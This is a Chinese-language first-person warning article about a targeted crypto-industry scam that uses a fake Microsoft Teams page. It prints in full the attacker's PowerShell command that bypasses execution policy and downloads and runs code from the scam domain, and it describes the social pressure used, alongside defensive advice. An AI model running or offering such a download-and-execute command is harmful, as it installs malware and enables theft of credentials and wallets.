我差点在微软Teams通话中被黑客攻击——以下是骗局运作方式

让我来告诉你，今天早些时候，我是如何险些成为一个精心设计的社会工程骗局的受害者的，这个骗局旨在利用像 Microsoft Teams 通话这样看似无害且平常的事情。. 

在大部分互动过程中，一切似乎都很正常。. 

我以为是业内人士的人联系我，安排在 Microsoft Teams 上开会，我乐于合作，欣然接受了邀请。. 

剧透警告：电话另一端的人是冒充者，他们试图诱骗我在电脑上运行恶意代码。. 

我在此讲述整个经历，是为了提醒加密货币和 Web3 社区的朋友、熟人和同行们注意。. 

今天差点轮到我了；明天可能就轮到别人了。. 

第一步：铺垫——“老朋友，咱们打个电话叙叙旧吧” 

当你收到来自你认识的某位知名加密货币公关公司高管的 Telegram 账号的消息时，你最想不到的就是自己正在落入网络钓鱼陷阱。. 

典型的危险信号当时并未立即显现。. 

这不是一条随机的私信。. 

我不是在和一个冒充账号聊天，那个账号里的“i”并没有被巧妙地替换成“l”。 

我之前还和这个账号有过聊天记录，所以我以为对方真的是本人。. 

从他们开始友好地重新联系到彼此，一切都显得很自然。不久之后，他们就收到了一个Calendly链接，用于预约30分钟的会议，以及一个Microsoft Teams通话邀请。.

正如我之前所说，整个过程中我的警惕性始终很高。我感受到对方展现出的专业精神和耐心，与顶级公关公司高管应有的水准完全一致。. 

我只知道我通过一位行业联系人的 Calendly 页面安排了一场 Teams 会议。.

诈骗者使用被盗账户主动联系受害者，并发送 Teams 会议链接。.

第二步：“仅限桌面端加入”陷阱 

会议当天，我像往常一样点击了手机上的Teams会议链接，这在以前我至少已经做过上千次了。然而，这次并没有像往常一样直接进入会议。屏幕上没有跳转到通话界面，而是显示“由于组织者设置，不允许通过移动设备访问此会议”。 

“糟了！我以前从来没遇到过这种情况。” 

嗯，这也不是dent 。. 

事后看来，那可能是第一个真正的危险信号。. 

错误页面是设计的一部分。诈骗分子需要你使用台式机或笔记本电脑，因为他们的恶意程序是一个只能在PC上运行的命令行脚本。.

浏览器中显示的网址“teams.livescalls.com” 并非真正的微软域名。 

正规的 Teams 会议使用 teams.microsoft.com 或 teams.live.com。 

从远处看，“livescalls.com”域名与真正的域名非常接近，但如果你仔细观察，就会发现它与真正的域名相差甚远。. 

一个是微软控制的网站，声称拥有超过3.2亿日活跃用户。另一个是攻击者控制的完全虚假的网站。. 

平心而论，有些组织可能会使用自定义域名进行团队会议。然而，据世界经济论坛预测，到2025年，诈骗分子将造成超过1万亿美元的损失，这足以让我不敢忽视自己的警惕。. 

伪造的“团队访问通知”页面会阻止移动设备访问，迫使受害者使用台式电脑运行恶意脚本。请注意其网址：teams.livescalls.com，而非微软域名。.

骗子在手机版被屏蔽后，会施压受害者在电脑版上加入，声称“合作伙伴正在等着你”。

步骤 3：有效载荷——“更新您的 TeamsFx SDK”

在桌面端启动后，这个模拟的 Teams 会议页面设计专业，看起来就像微软官方文档里的内容。它甚至包含了微软官方的措辞，说明 TeamsFx SDK 将于 2025 年 9 月停止支持。. 

解决方法？复制一段代码，然后在终端或命令提示符中运行它。.

如果你再用谷歌搜索一下，就会发现确实存在类似的 SDK。只是这次团队调用不需要它。. 

这段代码乍看之下无害——它设置了一些听起来很官方的环境变量，例如 TeamsFx_API_KEY 和 MS_Teams_API_SECRET。但真正的攻击点就隐藏在这些变量之间，而攻击者并不指望你能发现这个问题：

powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”

这一行命令绕过了 PowerShell 安全策略（-ep bypass），从攻击者的服务器下载代码，并立即执行它（iex = Invoke-Expression）。. 

就这样，攻击者托管的任何恶意软件、键盘记录器或远程访问工具都会悄无声息地安装到你的设备上。.

伪造的 Teams 会议界面向参会者展示了恶意的“TeamsFx SDK 更新”页面。请注意通话中的参会者——这些视频是由人工智能生成的。.

第四步：“别担心，很安全”的压力阶段

当我表示对运行脚本犹豫不决时，冒名顶替者立即采取了安抚和施压相结合的方式。. 

“别担心，这非常简单安全”这句话本意是想让我更容易按照屏幕截图中的说明在我的电脑上打开命令提示符。. 

“合作伙伴已加入 Zoom”，这句话本意是想让我感受到压力，因为我不会运行简单的命令提示符，所以不必让所有人切换平台。.

我并没有感到安心，也没有受到任何压力。.

当我建议将通话转移到 Google Meet 时，他们拒绝了。显然，他们的骗局只能通过他们伪造的 Teams 设置来实施。.

骗子会发送逐步运行恶意代码的说明，并向受害者保证：“别担心，这非常简单，对你来说也很安全。”

第五步：诈唬被识破——屏蔽并删除

在检查了脚本和域名后，我证实了我的怀疑：我正遭受社会工程攻击，并且距离成为世界经济论坛 2026 年统计数据的一部分只有几步之遥。. 

我直接告诉骗子：“我刚刚查过了，这个指令和那个网站都是假的。很遗憾，我没办法帮你完成这件事。” 我提出如果他们还想继续聊，我们可以转到Google Meet上进行。.

“但会议现在正在进行中，”电话那头传来消息。. 

不出所料，他们的回应意在让我意识到参加电话会议的紧迫性。毕竟，我不想让所有合作伙伴久等。.

片刻之后，他们删除了我们所有的通信记录，并将我拉黑了。. 

啊……这可不仅仅是个危险信号。简直是惊天动地的大事。. 

商业伙伴不会因为你质疑软件更新就删除所有对话记录并立即拉黑你。.

骗局被揭穿后，攻击者坚持说会议“正在进行中”，然后删除所有消息并拉黑受害者。.

如何保护自己

这种类型的攻击正在加密货币、Web3 和科技行业激增。诈骗分子会入侵或冒充公关人员、投资者和项目负责人的真实账户，以高价值人士为目标。以下是一些防范措施：

• 切勿在会议页面运行任何命令。 任何正规的视频通话平台都不会要求您将代码粘贴到终端或命令提示符中。
• 请检查网址。 真正的 Microsoft Teams 会议在 teams.microsoft.com 或 teams.live.com 上进行，而不是“teams.livescalls.com”或任何其他类似的域名。
• 要警惕“仅限桌面设备”的要求。 如果会议限制移动设备访问，这很可能是故意让你使用可以执行脚本的电脑。
• 通过其他渠道核实对方身份。 如果已知的联系人向您发送了不寻常的会议链接，请直接致电或通过其他平台发送消息进行确认。
• 注意“powershell -ep bypass”和“iex” 这两个命令。这是任何脚本中最危险的两个信号。前者会禁用安全设置，后者会盲目执行下载的代码。
• 如果您已经运行了该脚本： 请立即断开网络连接。运行完整的恶意软件扫描（例如 Malwarebytes 或 Windows Defender Offline）。使用另一台干净的设备更改所有密码。监控加密货币钱包和银行账户，查看是否存在未经授权的交易。

为什么这对加密货币和 Web3 很重要

我不会把这称为典型的网络钓鱼攻击，攻击者不会撒下大网，看看能钓到什么。. 

不，这是一次有针对性的、持续数天的社会工程攻击。攻击者伪装成业内人士，花了数天时间与你建立联系，并通过一个逼真的伪造微软页面，在Teams通话中引导你解决技术问题。. 

无论攻击者窃取你的dent、清空你的加密钱包，还是安装持久性远程访问恶意软件，他们都将获益匪浅，而毫无损失。. 

如果你是创始人、投资者，或者任何在加密货币和科技领域参与会议的人，请将这篇文章分享给你的团队。这些骗局的幕后黑手越来越狡猾，唯一的防御手段就是提高警惕。.